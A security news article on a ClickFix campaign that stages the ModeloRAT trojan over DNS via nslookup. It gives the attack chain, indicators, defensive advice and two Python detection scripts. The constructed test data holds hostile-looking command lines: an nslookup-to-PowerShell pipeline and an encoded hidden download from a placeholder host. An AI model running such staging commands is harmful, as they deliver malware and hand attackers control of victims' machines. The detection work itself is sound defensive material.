ClickFix Attacks Now Abuse DNS to Evade Security Tools
Microsoft warns of a ClickFix variant that uses nslookup commands to stage malware over DNS traffic, delivering ModeloRAT through a multi-stage attack chain.
ClickFix campaigns have evolved again. Microsoft disclosed a new variant that abuses DNS lookups to stage malware, blending malicious traffic with legitimate network activity and slipping past detections that watch only for HTTP downloads.
The technique uses the Windows nslookup command to query attacker-controlled DNS servers, retrieving encoded PowerShell payloads that ultimately deploy ModeloRAT, a Python-based remote access trojan that gives the operator command execution, file access and process control on the infected host.
How the Attack Chain Works
Like earlier ClickFix variants, this campaign relies on social engineering rather than technical exploits. Victims encounter fake CAPTCHA or verification pages that instruct them to press specific key combinations: Windows Key + R to open the Run dialog, Ctrl + V to paste a pre-loaded command, then Enter to execute.
Microsoft's analysis reveals the new twist: instead of directly downloading malware via HTTP, the initial command executes an nslookup query against a hard-coded external DNS server—bypassing the system's default resolver entirely.
In nslookup's output, the "Name:" field of the response carries an encoded payload. The pasted command filters that field out of the output and executes it as the second stage, which drives the rest of the infection chain:
- ZIP archive download from external server (azwsappdev[.]com)
- Malicious Python script extraction and execution
- Reconnaissance and discovery commands
- VBScript deployment to launch ModeloRAT
- Persistence via Windows Startup folder LNK file
Why DNS?
"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," Microsoft noted.
DNS traffic is rarely blocked outright because it's essential for normal network operation. Security tools that inspect HTTP/HTTPS traffic may miss DNS-tunneled payloads entirely. And because the attackers control the external DNS server, they can dynamically update payloads without changing the initial infection command.
The shift also sidesteps detections built around the usual download cradle: rules that key on PowerShell or mshta fetching content over HTTP see no web request at all, and the pasted command opens with what looks like a routine network diagnostic rather than an obvious loader. The payload still has to run through a script host, however, so process-lineage rules that tie an nslookup process to a PowerShell or wscript launch from the same parent remain effective.
ModeloRAT Capabilities
The final payload, ModeloRAT, is a Python-based RAT with broad capabilities. Once installed, attackers can:
- Execute arbitrary commands on infected systems
- Access and exfiltrate files
- Control running processes
- Establish persistent access via Startup folder shortcuts
The RAT uses token-protected C2 communication, adding an authentication layer that complicates researcher analysis. We previously covered ModeloRAT deployment via malicious Chrome extensions targeting enterprise environments, demonstrating that multiple threat actors have adopted this malware family.
Connection to Broader ClickFix Campaigns
ClickFix has become one of the most adaptable social engineering frameworks in the current threat landscape. Earlier variants used Python-based cross-platform payloads targeting both Windows and macOS. The technique has been used to distribute everything from infostealers to ransomware precursors.
According to Malwarebytes, concurrent campaigns are also deploying Lumma Stealer through CastleLoader, an AutoIt-based malware loader distributed via similar fake CAPTCHA pages.
The constant evolution reflects a truth about modern malware distribution: technical sophistication often matters less than psychological manipulation. Users who would never open a suspicious email attachment will readily follow "verification" instructions on what appears to be a legitimate website.
Indicators of Compromise
Network indicators:
- DNS queries sent directly to external resolvers rather than the organization's configured DNS servers
- Connections to azwsappdev[.]com
- Unusual DNS queries or responses, TXT records in particular, carrying encoded data
Host indicators:
- LNK files in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
- Python processes spawned from unexpected locations
- VBScript execution following PowerShell activity
Behavioral indicators:
- Users reporting requests to press Win+R during web browsing
- Clipboard manipulation (commands pasted without user typing)
Defensive Recommendations
For security teams:
- Monitor for nslookup invocations that pass an explicit server argument pointing outside the organization's resolvers; a lookup against the corporate DNS is routine, one against an arbitrary internet host is not
- Inspect DNS traffic for queries and responses, TXT records in particular, whose labels or data look encoded: unusually long or high-entropy labels and base64-like answer strings
- Alert on PowerShell, wscript or mshta launched from the same parent as, or within seconds of, an nslookup process
- Block script and executable launches from %TEMP% and other user-writable directories
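The four checks above can be expressed as rules over endpoint telemetry. What follows is an added example written for this page, not Microsoft's detection logic and not code from the original article: it runs over a handful of constructed Sysmon-style process-creation and file-creation events that mirror the chain described earlier (cmd.exe launching an nslookup pipeline into PowerShell, a Python interpreter started from %TEMP%, a VBScript, and a Startup-folder LNK). The resolver addresses, the 203.0.113.10 server, the hostnames, paths and PIDs are all constructed.

```python
"""Rules over endpoint telemetry for the DNS-staged ClickFix chain.

Added example for this page, not Microsoft's detection logic: every event,
path, PID and address below is constructed for illustration.
"""
import re
from collections import namedtuple
from datetime import datetime, timedelta

APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}   # hypothetical corporate resolvers
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PAIRING_WINDOW = timedelta(seconds=10)             # nslookup and script host in one pipeline
STARTUP_LNK_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData\\Local\\Temp|Temp|Downloads|Public)\\", re.I)
IP_OR_HOST_RE = re.compile(r"^(?:\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)$", re.I)

Finding = namedtuple("Finding", "rule pid detail")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def ts(event):
    return datetime.fromisoformat(event["ts"])


def nslookup_server(cmdline):
    """Return the explicit server argument of an nslookup command line, or None.

    Syntax is `nslookup [-opt ...] name [server]`: the second positional token
    overrides the system resolver ("-" as the name enters interactive mode).
    """
    tokens = cmdline.split()[1:]                   # drop the program name
    positional = [t.strip('"') for t in tokens if t == "-" or not t.startswith("-")]
    if len(positional) >= 2 and IP_OR_HOST_RE.match(positional[1]):
        return positional[1]
    return None


def detect(events):
    """Apply the four rules from the list above and return every finding."""
    findings = []
    nslookups = [e for e in events
                 if e["type"] == "ProcessCreate" and basename(e["image"]) == "nslookup.exe"]
    for e in events:
        if e["type"] == "FileCreate":
            if STARTUP_LNK_RE.search(e["target"]):
                findings.append(Finding("startup_lnk_persistence", e["pid"], e["target"]))
            continue
        name = basename(e["image"])
        if name == "nslookup.exe":
            server = nslookup_server(e["cmdline"])
            if server and server not in APPROVED_RESOLVERS:
                findings.append(Finding("external_nslookup", e["pid"], server))
        if name in SCRIPT_HOSTS:
            # Same parent, near-simultaneous start: the `nslookup ... | powershell` pipeline.
            for n in nslookups:
                if n["ppid"] == e["ppid"] and abs(ts(n) - ts(e)) <= PAIRING_WINDOW:
                    findings.append(Finding("script_host_after_nslookup", e["pid"],
                                            f"sibling nslookup pid {n['pid']}"))
                    break
        if USER_WRITABLE_RE.search(e["image"]) or (
                name in SCRIPT_HOSTS and USER_WRITABLE_RE.search(e["cmdline"])):
            findings.append(Finding("exec_from_user_writable", e["pid"], e["cmdline"]))
    return findings


# Constructed Sysmon-style events (not real telemetry) that mirror the chain above.
EVENTS = [
    {"ts": "2026-03-01T10:00:00", "type": "ProcessCreate", "pid": 4100, "ppid": 1200,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c nslookup -q=txt verify.example.invalid 203.0.113.10 | findstr Name | powershell -nop -"},
    {"ts": "2026-03-01T10:00:01", "type": "ProcessCreate", "pid": 4101, "ppid": 4100,
     "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup -q=txt verify.example.invalid 203.0.113.10"},
    {"ts": "2026-03-01T10:00:01", "type": "ProcessCreate", "pid": 4102, "ppid": 4100,
     "image": r"C:\Windows\System32\findstr.exe", "cmdline": "findstr Name"},
    {"ts": "2026-03-01T10:00:02", "type": "ProcessCreate", "pid": 4103, "ppid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -"},
    {"ts": "2026-03-01T10:00:09", "type": "ProcessCreate", "pid": 4104, "ppid": 4103,
     "image": r"C:\Users\alice\AppData\Local\Temp\py\python.exe",
     "cmdline": r"python.exe C:\Users\alice\AppData\Local\Temp\py\m.py"},
    {"ts": "2026-03-01T10:00:12", "type": "ProcessCreate", "pid": 4105, "ppid": 4104,
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\run.vbs"},
    {"ts": "2026-03-01T10:00:13", "type": "FileCreate", "pid": 4104, "ppid": 4103,
     "image": r"C:\Users\alice\AppData\Local\Temp\py\python.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    # Benign: a helpdesk lookup against the corporate resolver.
    {"ts": "2026-03-01T11:00:00", "type": "ProcessCreate", "pid": 5000, "ppid": 4900,
     "image": r"C:\Windows\System32\nslookup.exe",
     "cmdline": "nslookup intranet.corp.example 10.0.0.53"},
]

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f.rule:28} pid={f.pid} {f.detail}")
```

The pairing rule keys on a shared parent rather than strict ordering because cmd.exe starts every stage of a pipeline at once, so PowerShell can show up in telemetry before nslookup does. The benign helpdesk lookup against 10.0.0.53 produces no finding, which is the reason to key on the explicit server argument rather than on nslookup itself.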
For organizations:
Consider DNS filtering solutions that can inspect query content and block connections to known-malicious infrastructure. While this won't catch entirely novel campaigns, it reduces exposure to documented threats.
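To show what inspecting query content means in practice, here is an added example, not from Microsoft's report or the original article: a small analyzer over constructed Zeek-style DNS records that flags queries sent to an unapproved resolver, labels that are unusually long or high-entropy, and answer data that base64-decodes to readable script (ASCII or the UTF-16LE that PowerShell's -EncodedCommand uses). The resolver list, hostnames and the sample TXT answers are all constructed; the real campaign's encoding is not described on this page, and the base64 check is one plausible case, not a description of it.

```python
"""Flag DNS records that look like payload staging over DNS.

Added example for this page, not Microsoft's analysis: the resolver list,
hostnames and the base64 answers are all constructed. The base64 check is
one plausible encoding, not the one the campaign is known to use.
"""
import base64
import binascii
import math
import re
from collections import namedtuple

APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}   # hypothetical corporate resolvers
ENTROPY_LIMIT = 3.5       # bits per character; ordinary hostname labels sit well below
LABEL_LENGTH_LIMIT = 40   # a single label this long is rare outside CDNs and tunnels
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

Finding = namedtuple("Finding", "rule qname detail")


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty or one-symbol string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def decode_if_base64(data):
    """Return the text inside a base64 string when it decodes to readable script, else None."""
    if not B64_RE.match(data):
        return None
    try:
        raw = base64.b64decode(data + "=" * (-len(data) % 4), validate=True)
        # -EncodedCommand payloads are UTF-16LE, so NUL bytes mean "try that first".
        text = raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def suspicious_label(qname):
    """Return the first label that is unusually long or high-entropy, or None."""
    for label in qname.split("."):
        if len(label) > LABEL_LENGTH_LIMIT or shannon_entropy(label) > ENTROPY_LIMIT:
            return label
    return None


def analyze(records):
    """Apply the three checks to Zeek-style dns records and return the findings."""
    findings = []
    for r in records:
        if r["dst"] not in APPROVED_RESOLVERS:
            findings.append(Finding("external_resolver", r["qname"], r["dst"]))
        label = suspicious_label(r["qname"])
        if label:
            findings.append(Finding("suspicious_label", r["qname"], label))
        decoded = decode_if_base64(r["answer"])
        if decoded:
            findings.append(Finding("decodable_answer", r["qname"], decoded[:60]))
    return findings


# Constructed inputs: a long base64 label, a base64 ASCII answer, a base64 UTF-16LE answer.
SAMPLE_LABEL = base64.b64encode(b"session-" + b"0123456789abcdef" * 2).decode().rstrip("=")
SAMPLE_ANSWER = base64.b64encode(
    b"powershell -nop -w hidden -c iwr http://staging.example.invalid/pkg.zip").decode()
SAMPLE_ANSWER_UTF16 = base64.b64encode("Invoke-Expression 1".encode("utf-16-le")).decode()

RECORDS = [  # constructed Zeek-style dns records, not real traffic
    {"ts": "2026-03-01T10:00:01", "src": "10.0.5.21", "dst": "10.0.0.53",
     "qname": "www.microsoft.com", "qtype": "A", "answer": "20.70.246.20"},
    {"ts": "2026-03-01T10:00:02", "src": "10.0.5.21", "dst": "10.0.0.53",
     "qname": "corp.example", "qtype": "TXT",
     "answer": "v=spf1 include:spf.protection.outlook.com -all"},
    {"ts": "2026-03-01T10:00:03", "src": "10.0.5.21", "dst": "203.0.113.10",
     "qname": SAMPLE_LABEL + ".verify.example.invalid", "qtype": "TXT", "answer": SAMPLE_ANSWER},
]

if __name__ == "__main__":
    for f in analyze(RECORDS):
        print(f"{f.rule:18} {f.qname[:40]:40} {f.detail}")
```

Long high-entropy labels are also what CDN and cloud-storage hostnames look like, and SPF or DKIM TXT records are long by design, so in production the label and answer checks belong behind an allowlist of known domains, with the external-resolver check carrying most of the weight.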
User education remains critical. Employees should understand that legitimate websites never ask them to execute commands via the Windows Run dialog. Any site requesting keyboard shortcuts beyond normal web interaction—especially Win+R sequences—should be treated as suspicious and reported.
For individuals:
If you encounter a verification page asking you to press Windows Key + R, close the browser immediately. Legitimate CAPTCHA systems use mouse clicks on images or simple checkboxes, not command-line execution. Recognizing social engineering of this kind comes down to awareness: the request itself is the tell, and no website needs you to run a command on your own machine to prove you are human.
Why This Matters
ClickFix represents a broader shift toward low-tech, high-success attack methods. Technical vulnerability exploitation requires finding and weaponizing bugs. Social engineering requires only convincing someone to follow instructions.
The DNS abuse angle shows attackers actively circumventing defenses. Security teams block PowerShell downloads, so attackers move to DNS. Organizations restrict internet access, so attackers use protocols that can't be blocked without breaking legitimate operations.
Expect this adaptation cycle to continue. As long as ClickFix-style attacks remain effective, threat actors will keep refining the technique.